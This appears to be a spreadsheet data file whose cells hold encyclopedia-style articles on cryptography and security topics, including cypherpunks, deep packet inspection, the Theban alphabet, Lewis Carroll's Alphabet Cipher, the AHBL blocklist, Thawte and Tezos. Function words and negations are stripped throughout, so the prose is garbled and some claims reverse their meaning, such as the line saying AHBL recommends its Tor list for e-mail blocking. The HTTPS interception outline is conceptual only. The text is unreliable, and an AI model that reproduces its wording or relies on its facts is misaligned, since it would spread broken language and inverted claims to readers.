bellovin: bell labs researcher; later columbia professor; chief technologist federal trade commission 2012 matt blaze: bell labs researcher; later professor university pennsylvania; found flaws clipper chip eric blossom: designer starium cryptographically secured mobile phone; founder radio project callas: technical lead openpgp specification; co-founder chief technical officer corporation; co-founder philip zimmermann silent circle bram cohen: creator bittorrent matt curtin: founder interhack corporation; first faculty advisor ohio state university open source club; lecturer ohio state university hugh daniel (deceased): former microsystems employee; manager frees/wan project early important freeware ipsec implementation) suelette dreyfus: deniable cryptography co-inventor, journalist, co-author underground finney (deceased): cryptographer; main author core crypto libraries later versions pgp; designer rpow galperin: malware researcher security advocate; electronic frontier foundation activist john gilmore*: microsystems' fifth employee; co-founder cypherpunks electronic frontier foundation; project leader frees/wan mike godwin: electronic frontier foundation lawyer; electronic rights advocate goldberg*: professor university waterloo; co-designer off-the-record messaging protocol gonggrijp: founder xs4all; co-creator cryptophone matthew green, influential development zcash system sean hastings: founding havenco; co-author book wants dead johan helsingius: creator operator penet remailer nadia heninger: assistant professor university pennsylvania; security researcher robert hettinga: founder international conference financial cryptography; originator idea financial cryptography applied subset cryptography mark horowitz: author first server hudson: co-author ssleay, precursor openssl eric hughes: founding member cypherpunks; author cypherpunk's manifesto peter junger (deceased): professor case western reserve university paul kocher: president cryptography research, inc.; co-author protocol ryan lackey: co-founder havenco, world's first data brian lamacchia: designer xkms; research head microsoft research laurie: founder bunker, core openssl team member, google engineer. jameson lopp: software engineer, casa morgan marquis-boire: researcher, security engineer, privacy activist matt thomlinson (phantom): security engineer, leader microsoft's security efforts windows, azure trustworthy computing, ciso electronic arts timothy (deceased): former assistant chief scientist intel; author crypto anarchist manifesto cyphernomicon; founding member cypherpunks mailing list jude milhon (deceased; "st. jude"): founding member cypherpunks mailing list, credited naming group; co-creator mondo 2000 magazine vincent moscaritolo: founder crypto workshop; principal cryptographic engineer corporation; co-founder silent circle 4th-a technologies, satoshi nakamoto: pseudonym inventor(s) bitcoin. sameer parekh: former c2net co-founder cryptorights foundation human rights non-profit vipul prakash: co-founder sense/net; author vipul's razor; founder cloudmark runa sandvik: developer, political advocate sassaman (deceased): maintainer mixmaster remailer software; researcher katholieke universiteit leuven; biopunk steven schear: creator warrant canary; street performer protocol; founding member international financial cryptographer's association gnuradio; team member counterpane; former director data security company cylink mojonation bruce schneier*: well-known security author; founder counterpane richard stallman: founder free software foundation, privacy advocate nick szabo: inventor smart contracts; designer gold, precursor bitcoin dai: created b-money; cryptocurrency system co-proposed vmac message authentication algorithm. smallest subunit ether, wei, named him. zooko wilcox-o'hearn: digicash mojonation developer; founder zcash; co-designer tahoe-lafs jillian york: director international freedom expression electronic frontier foundation (eff) john young: anti-secrecy activist co-founder cryptome philip zimmermann: original creator v1.0 (1991); co-founder inc. (1996); co-founder callas silent circle* indicates someone mentioned acknowledgements stephenson's cryptonomicon. references this article incorporates material citizendium article "cypherpunk", licensed creative commons attribution-sharealike unported license gfdl. further reading andy greenberg: this machine kills secrets: wikileakers, cypherpunks, hacktivists free world's information. dutton adult 2012, isbn 978-0525953203 assange, julian (2012). cypherpunks: freedom future internet. isbn 978-1-939293-00-8.</t>
  </si>
  <si>
    <t>Distributed Checksum Clearinghouse</t>
  </si>
  <si>
    <t>distributed checksum clearinghouse (also referred dcc) method spam email detection. basic logic spam mails sent many recipients. message body appearing many times therefore bulk email. identifies bulk email calculating fuzzy checksum sending server. server responds number times received checksum. individual email create score time processed. bulk mail identified response number high. content examined. works protocol uses little bandwidth. resistant hashbusters "the main checksums fuzzy ignore aspects messages. fuzzy checksums changed spam evolves" likely identify mailing lists bulk email unless white listed. likewise, repeatedly sending email server increases number server, and, therefore, likelihood treated spam others. history according official website: based idea paul vixie fuzzy body matching reject spam corporate firewall operated vernon schryver starting 1997. designed written rhyolite software starting 2000. used production since winter 2000/2001. references external links official website</t>
  </si>
  <si>
    <t>Deep Packet Inspection</t>
  </si>
  <si>
    <t>deep packet inspection (dpi) type data processing inspects detail data sent computer network, take actions alerting, blocking, re-routing, logging accordingly. deep packet inspection often used baseline application behavior, analyze network usage, troubleshoot network performance, ensure data correct format, check malicious code, eavesdropping, internet censorship, among purposes. there multiple headers packets; network equipment needs first (the header) normal operation, second header (such udp) normally considered shallow packet inspection (usually called stateful packet inspection) despite definition.there multiple ways acquire packets deep packet inspection. using port mirroring (sometimes called span port) common way, well physically inserting network duplicates sends data stream analyzer tool inspection. deep packet inspection (and filtering) enables advanced network management, user service, security functions well internet data mining, eavesdropping, internet censorship. although used internet management many years, advocates neutrality fear technique used anticompetitively reduce openness internet.dpi used wide range applications, so-called "enterprise" level (corporations larger institutions), telecommunications service providers, governments. background technology boasts long technologically advanced history, starting 1990s, technology entered seen today common, mainstream deployments. technology traces roots back years, many pioneers contributed inventions among industry participants, common standards early innovation, following: rmon sniffer wiresharkessential functionality includes analysis packet headers protocol fields. example, wireshark offers essential functionality numerous dissectors display field names content and, cases, offer interpretation field values. some security solutions offer combine functionality intrusion detection system (ids) intrusion prevention system (ips) traditional stateful firewall. this combination makes possible detect certain attacks neither ids/ips stateful firewall catch own. stateful firewalls, able beginning packet flow, cannot catch events would bounds particular application. while idss able detect intrusions, little capability blocking attack. dpis used prevent attacks viruses worms wire speeds. more specifically, effective buffer overflow attacks, denial-of-service attacks (dos), sophisticated intrusions, small percentage worms within single packet.dpi-enabled devices ability look layer beyond layer model. cases, invoked look layer model. this includes headers data protocol structures well payload message. functionality invoked device looks takes action based information beyond layer model. identify classify traffic based signature database includes information extracted data part packet, allowing finer control classification based header information. points utilize encryption obfuscation techniques evade actions many cases. classified packet redirected, marked/tagged (see quality service), blocked, rate limited, course, reported reporting agent network. way, http errors different classifications identified forwarded analysis. many devices identify packet flows (rather packet-by-packet analysis), allowing control actions based accumulated flow information. enterprise level initially security enterprise level perimeter discipline, dominant philosophy keeping unauthorized users out, shielding authorized users outside world. frequently used tool accomplishing stateful firewall. permit fine-grained control access outside world pre-defined destinations internal network, well permitting access back hosts request outside world made previously.vulnerabilities exist network layers, however, visible stateful firewall. also, increase laptops enterprise makes difficult prevent threats viruses, worms, spyware penetrating corporate network, many users connect laptop less-secure networks home broadband connections wireless networks public locations. firewalls also distinguish permitted forbidden uses legitimately-accessed applications. enables administrators security officials policies enforce layers, including application user layer help combat threats.deep packet inspection able detect kinds buffer overflow attacks. used enterprise data leak prevention (dlp). when e-mail user tries send protected file, user given information proper clearance send file. network/internet service providers addition using secure internal networks, internet service providers also apply public networks provided customers. common uses isps lawful intercept, policy definition enforcement, targeted advertising, quality service, offering tiered services, copyright enforcement. lawful interception service providers required almost governments worldwide enable lawful intercept capabilities. decades legacy telephone environment, creating traffic access point (tap) using intercepting proxy server connects government's surveillance equipment. acquisition component functionality provided many ways, including dpi, dpi-enabled products calea-compliant" used directed court order access user's datastream. policy definition enforcement service providers obligated service-level agreement customers provide certain level service time, enforce acceptable policy, make implement certain policies cover copyright infringements, illegal materials, unfair bandwidth. countries isps required perform filtering, depending country's laws. allows service providers "readily know packets information receiving online—from e-mail, websites, sharing music, video software downloads". policies defined allow disallow connection address, certain protocols, even heuristics identify certain application behavior. targeted advertising because isps route traffic customers, able monitor web-browsing habits detailed allowing gain information customers' interests, used companies specializing targeted advertising. least 100,000 united states customers tracked way, many u.s. customers tracked way. technology providers include nebuad, front porch, phorm. u.s. isps monitoring customers include knology wide open west. addition, united kingdom british telecom admitted testing solutions phorm without customers' knowledge consent. quality service used neutrality. applications peer-to-peer (p2p) traffic present increasing problems broadband service providers. typically, traffic used applications file sharing. these kind files (i.e. documents, music, videos, applications). frequently large size media files transferred, drives increasing traffic loads, requiring additional network capacity. service providers minority users generate large quantities traffic degrade performance majority broadband subscribers using applications e-mail browsing less bandwidth. poor network performance increases customer dissatisfaction leads decline service revenues. allows operators oversell available bandwidth ensuring equitable bandwidth distribution users preventing network congestion. additionally, higher priority allocated voip video conferencing call requires latency versus browsing not. this approach service providers dynamically allocate bandwidth according traffic passing networks. tiered services mobile broadband service providers means implement tiered service plans, differentiate "walled garden" services "value added", "all-you-can-eat" "one-size-fits-all" data services. able charge "walled garden", application, service, "all-you-can-eat" rather "one-size-fits-all" package, operator tailor offering individual subscriber increase average revenue user (arpu). policy created user user group, system turn enforces policy, allowing user access different services applications. copyright enforcement isps sometimes requested copyright owners required courts official policy help enforce copyrights. 2006, denmark's largest isps, tele2, given court injunction told must block customers accessing pirate bay, launching point bittorrent.instead prosecuting file sharers time, international federation phonographic industry (ifpi) four record labels emi, sony bmg, universal music, warner music sued isps eircom enough protecting copyrights. ifpi wants isps filter traffic remove illicitly uploaded downloaded copyrighted material network, despite european directive 2000/31/ec clearly stating isps general obligation monitor information transmit, directive 2002/58/ec granting european citizens right privacy communications. motion picture association america (mpaa) enforces movie copyrights, taken position federal communications commission (fcc) network neutrality could hurt anti-piracy techniques deep packet inspection forms filtering. statistics allows isps gather statistical information patterns user group. instance, might interest whether users 2mbit connection network dissimilar manner users 5mbit connection. access trend data also helps network planning. governments addition using security networks, governments north america, europe, asia various purposes surveillance censorship. many programs classified. china chinese government uses deep packet inspection monitor censor network traffic content claims harmful chinese citizens state interests. this material includes pornography, information religion, political dissent. chinese network isps sensitive keyword going network. connection cut. people within china often find blocked accessing sites containing content related taiwanese tibetan independence, falun gong, dalai lama, tiananmen square protests massacre 1989, political parties oppose ruling communist party, variety anti-communist movements materials signed sensitive keywords already. china previously blocked voip traffic country many available voip applications function china. voice traffic skype unaffected, although text messages subject filtering, messages containing sensitive material, curse-words, simply delivered, notification provided either participant conversation. china also blocks visual media sites youtube.com various photography blogging sites. egypt since 2015, egypt reportedly started join list constantly denied egyptian national telecom regulatory authority (ntra) officials. however, came news country decided block encrypted messaging signal announced application's developer.in april 2017, voip applications including facetime, facebook messenger, viber, whatsapp calls skype blocked country.as 2022, facetime, facebook messenger unblocked. iran iranian government purchased system, reportedly deep packet inspection, 2008 nokia siemens networks (nsn) joint venture siemens german conglomerate, nokia corp., finnish cell telephone company), nokia solutions networks, according report wall street journal june, 2009, quoting spokesperson roome. according unnamed experts cited article, system "enables authorities block communication monitor gather information individuals, well alter disinformation purposes". system purchased telecommunication infrastructure co., part iranian government's telecom monopoly. according journal, "provided equipment iran last year internationally recognized concept 'lawful intercept,' said roome. that relates intercepting data purposes combating terrorism, child pornography, drug trafficking, criminal activities carried online, capability telecom companies have, said.... monitoring center nokia siemens networks sold iran described company brochure allowing 'the monitoring interception types voice data communication networks.' joint venture exited business included monitoring equipment, called 'intelligence solution,' march, selling perusa partners fund munich-based investment firm, roome said. said company determined longer part core business.the system followed purchases iran secure computing corp. earlier decade.questions raised reporting reliability journal report david isenberg, independent washington, d.c.-based analyst cato institute adjunct scholar, specifically saying roome denying quotes attributed isenberg, also similar complaints journal reporters earlier story. issued following denial: "has provided deep packet inspection, censorship internet filtering capability iran". concurrent article york times stated sale covered "spate news reports april [2009], including washington times," reviewed censorship internet media country, mention dpi.according walid al-saqaf, developer internet censorship circumventor alkasir, iran using deep packet inspection february 2012, bringing internet speeds entire country near standstill. this briefly eliminated access tools alkasir. malaysia incumbent malaysian government, headed barisan nasional, said using political opponent run-up 13th general elections held 2013. purpose dpi, instance, block and/or hinder access selected websites, e.g. facebook accounts, blogs news portals. russian federation mandated russia. federal no.139 enforces blocking websites russian internet blacklist using filtering, force isps analyzing data part packets. isps still different solutions implement blacklisting. 2019, governmental agency roskomnadzor planning nationwide rollout pilot project country's regions, estimated cost billion roubles (us$300m).some human rights activists consider deep packet inspection contrary article constitution russian federation, though legal process prove refute never taken place. singapore city state reportedly employs deep packet inspection internet traffic. syria state reportedly employs deep packet inspection internet traffic, analyze block forbidden transit. united states adopts internet calea requirements: fcc, pursuant mandate u.s. congress, line policies countries worldwide, required telecommunication providers, including internet services, capable supporting execution court order provide real-time communication forensics specified users. 2006, adopted title subpart rules requiring internet access providers meet requirements. platforms essential meeting requirement deployed purpose throughout u.s. national security agency (nsa), cooperation at&amp;t inc., used deep packet inspection make internet traffic surveillance, sorting, forwarding intelligent. used find packets carrying e-mail voice internet protocol (voip) telephone call. traffic associated at&amp;t's common backbone "split" fibers, dividing signal percent signal strength went output fiber. output fibers diverted secure room; carried communications at&amp;t's switching equipment. secure room contained narus traffic analyzers logic servers; narus states devices capable real-time data collection (recording data consideration) capture gigabits second. certain traffic selected sent dedicated line "central location" analysis. according affidavit expert witness scott marcus, former senior advisor internet technology federal communications commission, diverted traffic "represented all, substantially all, at&amp;t’s peering traffic francisco area", thus, "the designers the…configuration made attempt, terms location position fiber split, exclude data sources comprised primarily domestic data". narus's semantic traffic analyzer software, runs dell linux servers using dpi, sorts traffic 10gbit/s pick specific messages based targeted e-mail address, address case voip, telephone number. president george bush attorney general alberto gonzales asserted believe president authority order secret intercepts telephone e-mail exchanges people inside united states contacts abroad without obtaining fisa warrant.the defense information systems agency developed sensor platform uses deep packet inspection. vietnam vietnam launched network security center required isps upgrade hardware systems deep packet inspection block internet traffic. neutrality people organizations concerned privacy network neutrality find inspection content layers internet protocol offensive, saying example, "the 'net built open access non-discrimination packets!" critics network neutrality rules, meanwhile, call solution search problem" neutrality rules would reduce incentives upgrade networks launch next-generation network services.deep packet inspection considered many undermine infrastructure internet. encryption tunneling subverting with increased https privacy tunneling using vpns, effectiveness coming question. response, many application firewalls offer https inspection, decrypt https traffic analyse either terminate encryption, connection client browser uses plain http, re-encrypt data using https certificate, must distributed clients beforehand. techniques used https/ssl inspection (also known https/ssl interception) used man-in-the-middle (mitm) attacksit works like this: client wants connect https://www.targetwebsite.com traffic goes firewall security product firewall works transparent proxy firewall creates certificate signed "companyfirewall firewall presents "companyfirewall signed certificate client (not targetwebsite.com certificate) time firewall connects https://www.targetwebsite.com targetwebsite.com presents officially signed certificate (signed trusted firewall checks certificate trust chain firewall works man-in-the-middle. traffic client decrypted (with exchange information client), analysed (for harmful traffic, policy violation viruses), encrypted (with exchange information targetwebsite.com) sent targetwebsite.com traffic targetwebsite.com also decrypted (with exchange information targetwebsite.com), analysed (like above), encrypted (with exchange information client) sent client. firewall product read information exchanged ssl-client ssl-server (targetwebsite.com)this done tls-terminated connection (not https) long firewall product modify truststore ssl-client infrastructure security traditionally mantra served well operate layer model. this simply deciding packets routing comparably easy handle securely. this traditional model still allows isps accomplish required tasks safely restricting bandwidth depending amount bandwidth used (layer below) rather protocol application type (layer there strong often ignored argument action layer model provides known security community 'stepping stones' platforms conduct middle attacks from. this problem exacerbated isp's often choosing cheaper hardware poor security track records difficult arguably impossible secure task deep packet inspection. openbsd's packet filter specifically avoids reason cannot done securely confidence. this means dependent security services talktalk's former homesafe implementation actually trading security (protectable often already protectable many effective ways) cost decreased security users also less possibility mitigating risk. homesafe service particular blocking cannot opted even business users. software ndpi fork opendpi developers ntop) open source version non-obfuscated protocols. pace, another engine, includes obfuscated encrypted protocols, types associated skype encrypted bittorrent. opendpi longer maintained, opendpi-fork named ndpi created, actively maintained extended protocols including skype, webex, citrix many others. l7-filter classifier linux's netfilter identifies packets based application layer data. classify packets kazaa, http, jabber, citrix, bittorrent, ftp, gnucleus, edonkey2000, others. classifies streaming, mailing, p2p, voip, protocols, gaming applications. software retired replaced open source netify engine.hippie (hi-performance protocol identification engine) open source project developed linux kernel module. developed josh ballard. supports well firewall functionality.spid (statistical protocol identification) project based statistical analysis network flows identify application traffic. spid algorithm detect application layer protocol (layer signatures sequence bytes particular offset handshake), analyzing flow information (packet sizes, etc.) payload statistics (how frequently byte value occurs order measure entropy) pcap files. proof concept application currently supports approximately application/protocols edonkey obfuscation traffic, skype tcp, bittorrent, imap, irc, msn, others. tstat (tcp statistic analysis tool) provides insight traffic patterns gives details statistics numerous applications protocols.libprotoident introduces lightweight packet inspection (lpi), examines first four bytes payload direction. that allows minimize privacy concerns, decreasing disk space needed store packet traces necessary classification. libprotoident supports different protocols classification based combined approach using payload pattern matching, payload size, port numbers, matching.a french company called amesys, designed sold intrusive massive internet monitoring system eagle muammar gaddafi. comparison comprehensive comparison various network traffic classifiers, depend deep packet inspection (pace, opendpi, different configurations l7-filter, ndpi, libprotoident, cisco nbar), shown independent comparison popular tools traffic classification. hardware there greater emphasis placed deep packet inspection comes light rejection sopa pipa bills. many current methods slow costly, especially high bandwidth applications. more efficient methods developed. specialized routers able perform dpi; routers armed dictionary programs help identify purposes behind internet traffic routing. cisco systems second iteration enabled routers, announcement cisco router. also references external links what "deep inspection"? marcus ranum. retrieved december 2018. collection essays industry experts what deep packet inspection controversy white paper "deep packet inspection technology, applications neutrality" egypt's cyber-crackdown aided company used egyptian government recent internet crackdown deep packet inspection puts stamp evolving internet deep packet inspection using quotient filter</t>
  </si>
  <si>
    <t>Theban alphabet</t>
  </si>
  <si>
    <t>theban alphabet writing system, particular substitution cipher latin alphabet, used early modern occultists popular wicca movement. publication history first published johannes trithemius's polygraphia (1518) attributed honorius thebes pietro d'abano testifies greater fourth book". however, known extant known writings attributed d'abano (1250-1316). trithemius' student heinrich cornelius agrippa (1486–1535) included occulta philosophia (book iii, chap. 1531). also known found manuscripts writings honorius thebes (i.e. liber iuratus honorii sworn book honorius) exception composite manuscript found london, british library manuscript sloane 3853, however openly identifies agrippa source. uses correlations also known honorian alphabet runes honorius legendary magus (theban not, however, runic alphabet) witches' alphabet modern wicca forms witchcraft many substitution ciphers hide magical writings contents book shadows prying eyes. theban alphabet bears little resemblance alphabets found previous publications prior trithemius.there one-to-one correspondence theban letters latin alphabet. modern characters represented modern usage transliterated using theban characters theban letters exist single case. this suggests origin theban cipher calqued latin, along various alphabets described trithemius agrippa, based either latin hebrew.eric raymond, american software developer author, created draft proposal adding theban alphabet universal coded character set/unicode. characters notes external links theban alphabet omniglot theban alphabet theban today agrippa,</t>
  </si>
  <si>
    <t>The Cobden Centre</t>
  </si>
  <si>
    <t>cobden centre british economics think tank founded member parliament steve baker entrepreneur toby baxendale. developed consists proponents austrian school economics. contributors include steve baker, professor kevin dowd, gordon kerr cobden partners, syed kamall (the head conservative group european parliament), former cambridge university lecturer jamie whyte, former ukip douglas carswell, mosley keith weiner. editor rangeley. primary areas interest business cycle theory free market economic solutions digital currencies bitcoin free trade business cycle theory cobden centre espouses austrian theory business cycle, sometimes known "hayek-mises business cycle theory" famous proponents, friedrich hayek ludwig mises. cobden centre named richard cobden, 19th century classical liberal campaigned corn laws favour free trade individual liberty. cobden centre commercial called cobden partners, offers advice economics austrian school perspective. references external links cobden centre cobden partners gordon kerr bloomberg discussing euro steve baker op-ed city cruel delusion cheap money archived 2015-04-02 wayback machine</t>
  </si>
  <si>
    <t>The American Black Chamber</t>
  </si>
  <si>
    <t>american black chamber 1931 book herbert yardley. book describes inner workings interwar american governmental cryptography organization called black chamber. cryptography historian david kahn called book "the famous book cryptology ever published." describing inner workings organization, book created large interest heightened public awareness united states's cryptographic abilities. particular, japanese government became aware extent experience american government cryptography increased strength knowledge cryptography response. reviewers suggested book cost united states significantly pacific theater japan world ii.the book made film titled rendezvous (1935 film) starring william powell rosalind russell. references</t>
  </si>
  <si>
    <t>The Alphabet Cipher</t>
  </si>
  <si>
    <t>lewis carroll published "the alphabet-cipher" 1868, possibly children's magazine. describes known vigenère cipher, well-known scheme cryptography. while carroll calls cipher "unbreakable," kasiski already published 1863 volume describing break ciphers charles babbage secretly found ways break polyalphabetic ciphers previous decade crimean war. piece begins tabula recta. "the alphabet-cipher", lewis carroll, 1868 abcdefghijklmnopqrstuvwxyz abcdefghijklmnopqrstuvwxyz bcdefghijklmnopqrstuvwxyza cdefghijklmnopqrstuvwxyzab defghijklmnopqrstuvwxyzabc efghijklmnopqrstuvwxyzabcd fghijklmnopqrstuvwxyzabcde ghijklmnopqrstuvwxyzabcdef hijklmnopqrstuvwxyzabcdefg ijklmnopqrstuvwxyzabcdefgh jklmnopqrstuvwxyzabcdefghi klmnopqrstuvwxyzabcdefghij lmnopqrstuvwxyzabcdefghijk mnopqrstuvwxyzabcdefghijkl nopqrstuvwxyzabcdefghijklm opqrstuvwxyzabcdefghijklmn pqrstuvwxyzabcdefghijklmno qrstuvwxyzabcdefghijklmnop rstuvwxyzabcdefghijklmnopq stuvwxyzabcdefghijklmnopqr tuvwxyzabcdefghijklmnopqrs uvwxyzabcdefghijklmnopqrst vwxyzabcdefghijklmnopqrstu wxyzabcdefghijklmnopqrstuv xyzabcdefghijklmnopqrstuvw yzabcdefghijklmnopqrstuvwx zabcdefghijklmnopqrstuvwxy abcdefghijklmnopqrstuvwxyz explanation each column table forms dictionary symbols representing alphabet: thus, column, symbol letter represented; column, represented table, word sentence agreed correspondents. this called 'key-word', 'key-sentence', carried memory only. sending message, write key-word letter letter, repeating often necessary: letters key-word indicate column used translating letter message, symbols written underneath: copy symbols only, destroy first paper. impossible anyone, ignorant key-word, decipher message, even help table. example, key-word vigilance, message 'meet tuesday evening seven', first paper read follows— second contain receiver message can, process, retranslate english. table lost, easily written memory, observing first symbol column letter naming column, continued downwards alphabetical order. would necessary write particular columns required key-word, paper would afford adversary means discovering key-word. working demonstration tool alphabet cipher visit lewiscarrollresources.net</t>
  </si>
  <si>
    <t>The Abusive Hosts Blocking List</t>
  </si>
  <si>
    <t>abusive hosts blocking list (ahbl) internet abuse tracking filtering system developed summit open source development group, based original summit blocking list (2000–2002). dnsbls shut 2015 appear blacklisting entire internet. dnsbl rhsbl lists ahbl operated several dnsbl lists rhsbl list various types services. while data mostly added removed automatically, ahbl preferred manage certain categories hand accuracy. dnsbl list developed smtp services real-time blocking system. this means data collected various sources hours day, days week real time, merged database. data included spam sources, open proxies, open relays, ddos drones, usenet spam sources, controversial shoot sight listing policy. ircbl list reduced version dnsbl include spam sources data unnecessary networks chat systems. rhsbl list domain-based rather ip4r. included domains owned and/or operated spammers, known abusive domains, domains used send e-mail request domain owner). commonly used block domains from: address e-mail, well surbl type systems scan links e-mail. torbl list ip4r based list nodes. included nodes, including entrance, transit, exit nodes network. list contained entrance transit nodes, exit nodes, ahbl recommends using torbl e-mail blocking purposes.on march 2014, blacklist administrator brielle bruns announced abusive hosts blocking list dnsbls shut down. ahbl site also published announcement. controversy several ahbl's actions since creation harsh criticism members spam fighting community overly aggressive unreasonable. example complete blocking spain's largest internet service provider, telefónica.es, months "because ever increasing amount spam illegal coming rima-tde.net space." ahbl also publicly spoken spamhaus .mail icann proposal, later rejected icann.the ahbl also listed godaddy's hosting services continued hosting free speech store (richard scoville, attempted ahbl past). this listing escalated repeated attempts resolve issue godaddy's abuse department, told "that enforce unless forced enforcement."the second major source controversy comes ahbl's shoot sight listing policy, commonly used administrators force isps take action entities ahbl considers abusers, entities make legal "cart00ney" threats ahbl similar organizations. ahbl court scoville al., bruns after threatening ahbl lawsuit years, december 2005 richard scoville, operator website free speech store, sued ahbl, sosdg, associated individuals bexar county, texas $3.525 million claiming various damages, himself, business. suit dismissed prejudice january 2006 lack jurisdiction. also anti-spam techniques (e-mail) e-mail spam references external links official website abusive hosts blocking list listing policies ahbl page freespeechstore lawsuit</t>
  </si>
  <si>
    <t>Thawte</t>
  </si>
  <si>
    <t>thawte consulting (pronounced "thought") certificate authority (ca) x.509 certificates. thawte founded 1995 mark shuttleworth south africa. december 2016, then-parent company, symantec group, collectively third largest public internet 17.2% market share. history thawte originally mark shuttleworth's parents' garage. shuttleworth originally aimed produce secure server fettered restrictions export cryptography imposed united states. server, sioux, fork apache http server; later integrated stronghold server thawte began concentrate certification activities.in 1999, verisign acquired thawte stock purchase shuttleworth $575 million. both verisign thawte certificates first netscape browsers, thus "grandfathered" browsers. before verisign's purchase, market. verisign's certificate rollover take place january 2000—an unfortunate choice considering imminent bug. (thawte similar rollover july 1998.) purchase thawte ensured would business loss y2k.proceeds sale enabled shuttleworth become second space tourist found ubuntu project creation canonical (company).in august 2010, symantec acquired verisign's security business, including thawte.thawte part digicert completion symantec security acquisition. root certificate untrust following thawte's improper issuance certificates dispute google geotrust root certificate became untrusted. this sale symantec's certificate business included thawte august 2017 thoma bravo billion intention merging digicert.from december 2017 thawte started issue certificates digicert trusted root certificate. trust thawte trust discontinued november 2009. thawte used issue free email certificates thawte trust optional identity verification mechanism obtain free thawte email certificate, person needed sign thawte freemail account allowed person create many certificates wanted. although certificate associated exactly email address, multiple email addresses could associated single thawte freemail account. person email address, could created different certificate account. associating thawte freemail account real identity person owning based trust model. person's identity assured meeting face-to-face "thawte notaries" needed identification keep copy (for least five years). points assigned notaries. number points notary could assigned ranges general, experienced notary points could assigned (see table below). notaries directly verified thawte, events thawte attended held, automatically could issued points without needing gain experience. number points determined person's account with fewer points, certificates issued "thawte freemail member" name field. with points, certificates person's name presence person's real name certificate useful identifying certificate (e.g., stored store) help recipient recognise trust certificate. purposes signing encrypting types certificates could used way, types certificates person's email address with points, person became thawte notary. when person becomes notary, initially listed underneath country. they could change location text advertise services offer. changes advertising text approved thawte notary placed pending state waits approval. approval process could take several weeks, person's advertisement published system access notary. cross notarisation allowed: notary could notarise person notarised them. after life thawte notaries submitting minimal information gossamer spider trust ("gswot"; grass-roots openpgp pki) safe-keeping hopes increase longevity earned trust points. collaborative effort aims bind thawte notary names email addresses now-existing entry thawte's trust notary map. thawte notaries within without gswot performing validations. initiative bear fruit thawte notaries fail find create recognise former status thawte trust notary. thawte notaries list gswot maintained november 2010. cacert, free certification authority, took large part participants thawte trust special programme. also cryptography public certificate transport layer security references external links official website thawte germany thawte france</t>
  </si>
  <si>
    <t>Tezos</t>
  </si>
  <si>
    <t>tezos open-source blockchain execute peer-to-peer transactions serve platform deploying smart contracts. native cryptocurrency tezos blockchain symbol xtz. tezos network achieves consensus using proof-of-stake. tezos uses on-chain governance model enables protocol amended upgrade proposals receive favorable vote community. testnet launched june 2018, mainnet went live september 2018. history tezos, first proposed 2014, created husband-and-wife team arthur kathleen breitman, tezos foundation founded johann gevers. arthur studied applied mathematics, computer science, physics france financial mathematics york university nassim nicholas taleb working quantitative finance. kathleen studied cornell university worked hedge fund consultant. arthur leader anarcho-capitalist group york, kathleen libertarian republican became interested politics listening rush limbaugh crypto-anarchist lunch 2010. arthur follower patri friedman, founder seasteading institute, learned gevers friedman hired project build libertarian city honduras.while working morgan stanley 2014, arthur breitman released papers proposing type blockchain pseudonym goodman", referencing journalist newsweek misidentified creator bitcoin. chose name "tezos" writing program list unclaimed websites could pronounced english. 2015, registered dynamic ledger solutions (dls) delaware chief executive. breitmans contracted french firm ocamlpro help develop software. arthur worked morgan stanley time, provide notice work tezos required financial industry regulatory authority (finra), eventually fined $20,000. sought raise million banks unable find backers. 2016, left morgan stanley; tezos received $612,000 backers breitmans planned initial coin offering (ico).in 2016, arthur travelled meet gevers zug, switzerland, swiss foundation order avoid securities laws benefit banking regulations effective corporate rate zero. 2017, gevers created tezos foundation support project raised $232 million bitcoin ethereum biggest initial coin offerings (icos) time. time, also establishing monetas, digital currency. they planned foundation become non-profit would raise money acquire dls, owned group's technology. they received $1.5 million investment draper hired public relations firm strange brew promote project. firm alleged falsely claimed large american financial firms using tezos. subsequently, breitmans head foundation, johann gevers, publicly feuded control project. disagreements delays deployment tezos, caused investors bring lawsuits alleging unauthorized sales securities. 2020, tezos founders settled lawsuits, tezos foundation paying million. legal disputes fundraiser tezos began july 2017, received 66,000 bitcoins 361,000 ethers, market value $232 million. contributions termed "non-refundable donations", kathleen breitman likened pledge drive people would receive tote bags, though participants considered investment. considered investment rather donation, would fall purview securities exchange commission (sec). after ico, planned tezos foundation would acquire dls, tezos blockchain functioned least three months, breitmans would receive 8.5% tokens.by october, breitmans gevers dispute control project, breitmans alleging gevers pressured foundation council signing contract giving bonus $1.5 million. gevers refused give breitmans payout, valued around million cryptocurrency. december, three lawsuits filed united states alleging fraud fundraiser tezos unregistered security. 2018, gevers resigned received $400,000, foundation board replaced; tezos went live september. tezos foundation paid million 2020 settle lawsuits federal courts ruled whether sale unregistered securities. arthur breitman joined foundation's council 2021. design primary protocol tezos utilizes liquid proof stake (lpos) supports turing-complete smart contracts domain-specific language called michelson. michelson purely functional stack-based language reduced instruction side effects, designed formal verification mind.in tezos' lpos model, network nodes validate blocks blockchain known bakers selected perform actions proportionally share rolls 8,000 stake, baker receives staking rewards form newly minted successfully validating block adding blockchain. holders delegate bakers share staking rewards bakers receive. holders stake delegate risk suffering loss value inflation created distributed bakers validating blocks adding blockchain. january 2021, nearly circulation either directly staked bakers delegated bakers staking.the tezos protocol allows amended staged process performed committing operations stored blockchain submit proposals (intended code changes) vote changes. proposal receives enough votes protocol updates incorporate code changes.the tezos blockchain used nfts alternative energy-intensive projects ethereum. token standards fa1.2 (tzip-7) erc20-like fungible token standard tezos. core, fa1.2 contains ledger maps identities token balances, providing standard token transfer operations, well providing approval external contracts (e.g. auction) accounts transfer user's tokens. (tzip-12) standard unified token contract interface, supporting wide range token types implementations. tokens might fungible non-fungible. token contract designed support single token type (e.g. erc-20 erc-721) multiple token types (e.g. erc-1155) optimize batch transfers atomic swaps tokens. tzip-16 standard accessing contract metadata json format on-chain storage off-chain using ipfs http(s). reliability 2018, tezos foundation commissioned audit company least authority perform five audits published march 2019. these audits determined tezos protects chain reorganizations selfish-baking, common issues blockchains using nakamoto-style consensus. subsequent analysis confirms selfish baking tezos results insignificant profits, even baker attempting large portion stake. independent 2020 study revealed potential flaw current consensus proof stake mechanism tezos uses, providing theoretical analysis feasibility profitability block stealing attack referred "selfish endorsing". change protocol proposed reduce profitability dishonest behavior. with implementation tenderbake protocol amendment, described behavior mitigated longer actual. references external links official website tezos foundation website tezos commons website</t>
  </si>
  <si>
    <t>TextSecure</t>
  </si>
  <si>
